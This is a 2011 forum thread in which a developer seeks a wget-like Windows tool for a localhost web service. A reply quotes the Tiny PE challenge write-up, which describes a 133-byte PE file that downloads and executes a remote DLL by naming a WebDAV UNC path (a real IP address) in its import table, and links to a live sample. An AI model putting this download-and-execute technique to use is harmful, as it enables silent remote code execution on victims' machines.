Interests:I'm just a quiet simple person with a very quiet simple life living one day at a time..

European Union

Posted 12 December 2011 - 12:48 AM

Hello,

Internet is not available necessarly, network connectivity is possible but on the case that I have in mind, the idea is to interact with a server running on localhost.

Even with Internet, most times only port 80 is available.

I will explain better.

Right now I'm working on a project called remedium. The UI is web based and the interaction of commands from the outside can be made from the command line using a browser or wget if we want to automate things from script.

For example, one app inside remedium can mount a registry hive using rawreg and then we can use web requests to add keys, read values, etc. One of the shortcomings of winbuilder was getting output from external apps or requests, and using web requests this is solved in a very elegant manner.

So, it would be nice to have a tool similar to wget on windows but I couldn't really find such tool, reason why I asked the community.

The goal of the Tiny PE challenge was to write the smallest PE file that downloads a file from the Internet and executes it. The standard technique for this is to call URLDownloadToFileA and then WinExec to execute the file. There are many examples of shellcode that uses this API, but it requires us to load URLMON.DLL and call multiple functions, which would increase the size of our PE file significantly.A less known feature of Windows XP is the WebDAV Mini-Redirector. It translates UNC paths used by all Windows applications to URLs and tries to access them over the WebDAV protocol. This means that we can pass a UNC path to WinExec and the redirector will attempt to download the specified file over WebDAV on port 80.Even more interesting is the fact that you can specify a UNC path in the import section of the PE file. If we specify \\66.93.68.6\z as the name of the imported DLL, the Windows loader will try to download the DLL file from our web server.This allows us to create a PE file that downloads and excutes a file from the Internet without executing a single line of code. All we have to do is put our payload in the DllMain function in the DLL, put the DLL on a publicly accessible WebDAV server and specify the UNC path to the file in the imports section of the PE file. When the loader processes the imports of the PE file, it will load the DLL from the WebDAV server and execute its DllMain function.;; The DLL name should be at most 16 bytes, including the null terminator;

dllname: db "\\66.93.68.6\z", 0 times 16-($-dllname) db 0

The size of the PE file with a UNC import is still only 133 bytes.WARNING: The PE file linked below is live. It will attempt to download and execute a payload DLL from http://66.93.68.6/z. The DLL will display a message box and exit, but you should take proper precautions and treat it as untrusted code.http://www.phreedom....ar/code/tinype/

Interests:I'm just a quiet simple person with a very quiet simple life living one day at a time..

European Union

Posted 12 December 2011 - 03:47 PM

Thank you.

Very nice find. Using your tip as starting point, I see that NET USE can be employed for this task.

I can type:

net use z: http://localhost:10101/logtracker

And this code triggers the web service as intended. It doesn't get me the result as a web page on my side but at least I have now a way to call web pages and trigger reactions and this is available from every version of Windows since XP.